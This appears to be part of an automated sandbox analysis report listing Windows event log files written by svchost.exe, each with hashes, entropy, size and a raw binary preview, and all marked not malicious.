Preview:	ElfChnk.w...............w...................`...p ..6......................................................................C.rd.......................................R...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................*..8...w.........[~v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9686996650766164
Encrypted:	false
SSDEEP:	384:bh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDw:bMAP1Qa5AgfQQp
MD5:	A72FD2A2ECBCE21C05A3C1202C67D32C
SHA1:	627B73FE3D94A55BB82A2912B58F8B2D751E9170
SHA-256:	CEA33EE64996297DA7577C028FA3E4E43A9B9AA15480982F91400AC9059B9705
SHA-512:	3DA0FFC6A0F7D8B985861EE2608AD26CDD6FF46B6531E2C9E519B51797715824100FFE8661E0D063D810C6F5E4DA074688EED102515FFBE767C44536914D8592
Malicious:	false
Preview:	ElfChnk......................................c..(e.....z.......................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................U...............&..............;...............................*..x...........HD................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.428593954397479
Encrypted:	false
SSDEEP:	768:vWFCGPlo5jRe0bMgxV3PBT41Nm3Lwb4XP2b9Ub/b4bebbb3bVbQb+bjb8bMbw:gC1FjaujkyHrBMS/AQ
MD5:	EFBC72539360CE6A39321BF0FE442A7B
SHA1:	1F58389B378F167AA610EEB69560236837C9E72D
SHA-256:	63DCBE413E0D801FF428BB9F900E6645E90B026CDE02B19AA1DBB0304E1F71AE
SHA-512:	B0F989B84F3E8089903F3FFF818A1257CD6208377FD537DDCBFE2829E46D2AD2C4DF29B69A8DCDF3FC0F8CBDDE88372A3BEC41C2D95DF760F7EF3D8F45E3E468
Malicious:	false
Preview:	ElfChnk.t...............t....................M..8O....y.....................................................................@.h.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...................e-............... ......&....2..}#..........m....................N..........}0..........**......t...........v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.2423583340735527
Encrypted:	false
SSDEEP:	384:3hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:31T4hvqp
MD5:	9C72FFFEE60C20888D6442DFA30F96DA
SHA1:	7DBC45C4074ED6D9C23CBB2FB102FE28F0AF03E6
SHA-256:	FF65135452A8463A8FC8B2B0A7A682321C8896202627A67A6A9CBB87CA967C92
SHA-512:	68FBF1C38B8CAE6C4DDADFC18660BD8F6F62D73F634D850D1C7A0932E8159A301B589C6F59EDF482668E14DA95E96048C2411C39212715DF9D2C1CDE5CF1FF9E
Malicious:	false
Preview:	ElfChnk.........i...............i........... ........po.........................................................................................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3531516657590963
Encrypted:	false
SSDEEP:	384:NchFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDW:SzSKEqsMuy6C
MD5:	DA384425E3EEA8087F6731F7EE3DB772
SHA1:	2D9B780AB5E10C4C18A9765873BB5D87D7D0C4A5
SHA-256:	29C747FE79EE865AC2F59E8656F9E13484F370A944F5A6F1B001EB5849F34456
SHA-512:	C96CBF23D2590F4986A1BBC6A1000BAA0D2A46F7744C59FC97C09BF5BE8B9DE30006A3960CC7BFB01B1DE54B1F435053240CCDA6106638E4428A76622F6D57AC
Malicious:	false
Preview:	ElfChnk.........H...............H...........Xy...z...U>K......................................................................;................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=................`..............................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.067840786143577
Encrypted:	false
SSDEEP:	384:UYhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3B:xmw9g3Lu
MD5:	FC30BCA14D074E23863821A5D1C99310
SHA1:	E02F0200FFB00B6E97ED2249C003EA61B98BAE7A
SHA-256:	637112F9564861E2B38E6272ABB2AEF3D1CF67DE8B0132DDA165D80D1888896D
SHA-512:	DB9DA92830EF89D417B4541C86D968E5E34DD7D012195AD8424F049ABA9CEC31323333086F8743105B6D732B5368B3C7ACA6A952DE0365C788A799C6EC33956E
Malicious:	false
Preview:	ElfChnk.........3...............3............i..Xk...p......................................................................G...................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#................X..............................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.9013141789584527
Encrypted:	false
SSDEEP:	384:dRh2IYYINEIuIgucwi2IM+I6eIiISpI2+IAI+ITNI/6ILIbI+I:fspNI
MD5:	429D91656AEA2040959DEB5C242DD865
SHA1:	98BC49D2423BB8DBE3829DFC3EE1ABB18BECC4F7
SHA-256:	BC38E1F423840D557385A43F23B1C8CA2C8FA7F41672167D7A1A8D5637E9213B
SHA-512:	0E8C5B68D5513A20D256047AF256191FE7E1BD5AEC0BB77F0A9D5DDE08F30A331342229E398D395FF431A684F2771F456E546C7F88D473D8FE5E99D8441A3F3D
Malicious:	false
Preview:	ElfChnk.8.......H.......8.......H...............H..........................................................................R..S................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................5)......................................................................................**......8.......Q(.Bo.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 130, DIRTY
Category:	modified
Size (bytes):	1052672
Entropy (8bit):	0.4524152612387133
Encrypted:	false
SSDEEP:	768:FnKx9PIEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4gm/Rg6s:lp
MD5:	333BE72086723FD88A00FD45DF9B40E3
SHA1:	B22FCE3AA64D982F59E924A558BF8BBF29833CD2
SHA-256:	BF52D3CAB0F5602F6534AD967372C5113168391E21D0F199740B936D3786A95D
SHA-512:	9EE0E3F08F76EAA2A148EEF058E5B85929E1A2E0068A1D940ACE3B43A01BDEEC280F3CE356EC7A4F956825813134DD924507D341ACE6F011D94A085C01377374
Malicious:	false
Preview:	ElfFile.....................................................................................................................T...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 427, DIRTY
Category:	dropped
Size (bytes):	126328
Entropy (8bit):	5.713855631271473
Encrypted:	false
SSDEEP:	384:4W1hga5ZzuzNz0zxzuewKWMKla5rEa5P9o2K7zyzIzga5TzuzNz0zxzuewKWMKGI:/df400NZh3GTjHudf400NZh3GTjH0
MD5:	B4E5C3878FE1C56495166B164B17944C
SHA1:	92DAC311D0630F95B3B14A4E517D4877E6CC1435
SHA-256:	5DF8D9D18C3C9E95124FCCC77361D31FF86F1551346E5FC2F5B895D30EC6997D
SHA-512:	23BE312ADAEAB5AA052EEDE1CFA7244D7938F56771212EFCCDCAD626D39864D4136B69608444F892E10081A2D826B5E4A793465F9D2B004D288316E54D6D0B97
Malicious:	false
Preview:	ElfFile........................................................................................................................]ElfChnk..............................................(~................................................................................................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................v...................................................1....y......**..............0...q.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0613471542370174
Encrypted:	false
SSDEEP:	384:3h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMXpxMPGMtbMkP:3eJaR
MD5:	C67B1E4F2BD829BD747226920AB86F1A
SHA1:	249C5BAD68E543FFFB9EE95EE72A9D74A4BA020B
SHA-256:	23EE8762E2F3BA4AEC936695B2A44AF1AA0643956A312A1A233F8A403E3397F5
SHA-512:	DD15B409EB26400A20B5539110C9865808976F8A55D161CA8FA70EF56E1CCE3F58B38B0777CDB13E7FA8A532924013A531F965A9CDD97D277168ADE03274EC37
Malicious:	false
Preview:	ElfChnk.........................................P0..o.0b....................................................................W.P........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................................)..............................................................*..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.015119691858683
Encrypted:	false
SSDEEP:	384:Ahk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1G:ABjdjP0csP1P
MD5:	C166821735DECBE900C8932229387587
SHA1:	1C0F4203F095DECC7B7A55ED86A4B7EE7BDC4AEF
SHA-256:	8057DF6208CB8E99851CEAB8C375DFFC66DE911374139A922BE3AAB5FFD4216A
SHA-512:	981FBEA4B761C91185AAF371436135367B76249F78350B47CC4CBCE86AFC7A2B2F810404980A7FF9CBA513E1B44C5DBC452F133D600895EFC6FA4D893EF14F90
Malicious:	false
Preview:	ElfChnk.........~...............~...........(......../.U....................................................................x.m.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................*..............5.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.008476091895016
Encrypted:	false
SSDEEP:	384:0hDIEQAGxIHIFIW9IflITiIfIEI+IhvrIXI4IdIJYIfXITzIchIdlIfiITZBI4YU:0ZxGg4t0rR/vl/
MD5:	FB744D404AE3C29261F98570F3B5F905
SHA1:	4C31E63276C9EE848721587BE177CD1D40C0C557
SHA-256:	36C4EAA0034AAF67D652DE187169DF272F15C4DDAA8003A086429673A6B072F9
SHA-512:	A522D626BA93A19548468E0A63B00B2C3D83A1CFB61CE02708959CC2031F466069E0B7831444AC2B9D0D175076BD627B3302993ED81E0A36AE489E60A9F72FBA
Malicious:	false
Preview:	ElfChnk.T...............T................... ...8......u....................................................................L...........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................y..................1....J...................................)..........................**......T.......B..d..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7762826173073204
Encrypted:	false
SSDEEP:	384:dWh6iIvcImIvITIQIoIoI3IEIMIoIBIQIssImIaIErI:dWoxw0
MD5:	6EE4AC1814B31DCBD723D72E291AB08B
SHA1:	B258FB048E1EBFA5D5AF4D44FC46C9553BCD4532
SHA-256:	DE576BC4A4CE5F2595B830029354848D10AE01EE7370EE1110F3829D5D00F949
SHA-512:	413E15D4594190DBD5827B5F0C536A3D6D28D3252B788D83F63F52ACCA9A07A798442F0953BB3BD6F5AAECA48202BB1D1340E9D2383AA949646F422BCDE3AA0A
Malicious:	false
Preview:	ElfChnk......................................!..X"....u........................................................................N............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................^...............................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.891613133429162
Encrypted:	false
SSDEEP:	768:F4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13/:3
MD5:	323B15A3B6A505ABF1F1A5455BDEAB55
SHA1:	350D6292354A4F38F0411F761C9E6BB45E4F52BE
SHA-256:	A9B17FDF8E2AEF739CDA87AD1D4E1ED7CBE9C24061BB655773F69088C5173B79
SHA-512:	5D18E7D710257229E782E3299D5305DF7A914A4AAFD6DE6569F7760EECC6683E5D0176C4274387B48399723CF2F31E4724517222DAFC0EFE27DE9BB902934BBB
Malicious:	false
Preview:	ElfChnk.........................................(.....H8....................................................................)...................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76304
Entropy (8bit):	3.521053217082044
Encrypted:	false
SSDEEP:	384:3h9yZyayPyySQyl1yDh9yZyayPyySQyl1yKSB/X/n/P/knJ/8i/y/R/nutDxfPKD:33SM3S+utDBjV8k+uceUtHpoVWWr3SN
MD5:	A51B43186E0C7C72258C8A7642EE721F
SHA1:	913D85B192FBA4696A121CD15586310D2E3B511B
SHA-256:	5D96882C41A6AC78376CDD2D3C04A698D940BE209651C8C2EFEE4275B9348236
SHA-512:	D3725A084B0E39B604B8649B4A6A2AFB0AF9A25987772FD6A18C9BC4526682C332F991CD697A9AF87472C00BFE92BA1976CACC33303EA6E72A8A4C8DFEC238C4
Malicious:	false
Preview:	ElfChnk.................Q.......V...........(.........&\...................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**..X...Q........RP.U.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.448280624217298
Encrypted:	false
SSDEEP:	768:xtXuRePtjkY4SFbGqbDhmqhkwh8N+nevi6al:TXAktPFbGsDhmch8N+9
MD5:	94BB501CAC8A4656D413B2A89106DB41
SHA1:	927BB5C1749D5F8BA0A2CD4785871BCCDCF4CED8
SHA-256:	B5FED83A49B0F1A2B01F413F23E828BAF27FD96BCABED8A5BBDCF3B854B3D4AA
SHA-512:	526C65441651D6B2AB736B8EA41A11DAE1F11C83DE41CB8E407953B71BFE3DB989D7911D268A8B35FF775178635C2A94B2B256CEBA1874407D4AB850C38F290B
Malicious:	false
Preview:	ElfChnk.........L...............L...................'.g.......................................................................................l...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................OP...........&.......8..................&........4..........o....1../)..............................w?..**...............?.;v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7288447838351539
Encrypted:	false
SSDEEP:	384:khP8o8Z85848V8M8g8D8R8E8x8jO89868:kU
MD5:	900B1B576C36C0B2FC590A5CE7309203
SHA1:	942049A72CE456363E77F0BAE82D6701A3A61D72
SHA-256:	32FC11CA9E080928B315A43BD61806D103FE9B674B9A69F6A145C3BC2D126D19
SHA-512:	6FEDA7E7D931D132DF6AB4511DD693591900AA0B6FA461295E4EF7B2E4DF8478ADEB889ED131C84E6C0723904D4B0C4C738A7E541E2C227A4086BFBD217A278F
Malicious:	false
Preview:	ElfChnk.....................................@..........R....................................................................de.(........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................v...............................................................**..(.............................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.757403468828637
Encrypted:	false
SSDEEP:	1536:QXhdUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:QX7nS
MD5:	1ED4BE3BF23FC25D604C760CF68E6DA1
SHA1:	CF1F582EB7682A49E7F7A644B1F705467707FCED
SHA-256:	FB0DCAD44F8E85ADB12AD250615FF3BB5039A8353B4552DBBE83472C3E8C4C82
SHA-512:	48AB4CF5A2C06FF9718B575728CFC394F4F3376F6859252BA43B3B5EF90728D79DE767BB91C6CD2E475ABCA7961ED9BAC769D33DF7DE3C9A95DB1EA083C064D7
Malicious:	false
Preview:	ElfChnk.........&...............&...........`G...I............................................................................].................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................=......................................O.......................**..............g5...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3435273270897063
Encrypted:	false
SSDEEP:	768:q0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O2aWQYIW02cWW+EWZ:acE
MD5:	41DFEEC6FB9A58E02D87AC6CE244D440
SHA1:	EAC1B6A060C57B3A4134C818F736DF83384166D7
SHA-256:	ADD4FDA1D195B45C71E630E98DC2F02DA94950897DE481AB3F90C1043E42304D
SHA-512:	AC8CA0006FE3B7B01F6A5DCB1C8113D01565778BE06EE80E388DD5F6D12188D7939C178A69FFA234F6DE27B1C24854C6D34470AE8479DE5C06B062AD0AE776F9
Malicious:	false
Preview:	ElfChnk.........<...............<...........8t..hv.... n......................................................................t................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F......................................&................................b..........................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81616
Entropy (8bit):	4.133207518053159
Encrypted:	false
SSDEEP:	384:erixNmixNG1hbixkk1bdzpFEVQ35pIixR5pDXixR5yYcixR5pbixR5pJrixNmixt:eJq9LpBVi7CP0HvnqiR
MD5:	F62148F968BBA791FDB4C0898665B843
SHA1:	DC98846224D6594C7A80F92F99DEA5593C4E616E
SHA-256:	10C83A16B889EFD2162A3E26041D8F94FF0044A038C0B4109FF44D383E417022
SHA-512:	3137BFDED1BE035D54B83A7540FDDFD7446F061C76AEC4F3C638BE0BE74405E81D5CCD2D72B7762F285ED9ACFF6C6D0349C653045BAE527B0D6E16F7DD02C6CC
Malicious:	false
Preview:	ElfChnk.'.......-.......'.......-...........X...X1.............................................................................u................T.......................\|...=...........................................................................................................................f...............?...........................m...................M...F...........................................-.......................................&...............................................................**......,......./...U.........1...&...............................................................L.......b...p.!................./...U....Y..v......v...D.......,........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^-...........h...........................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.331574255119962
Encrypted:	false
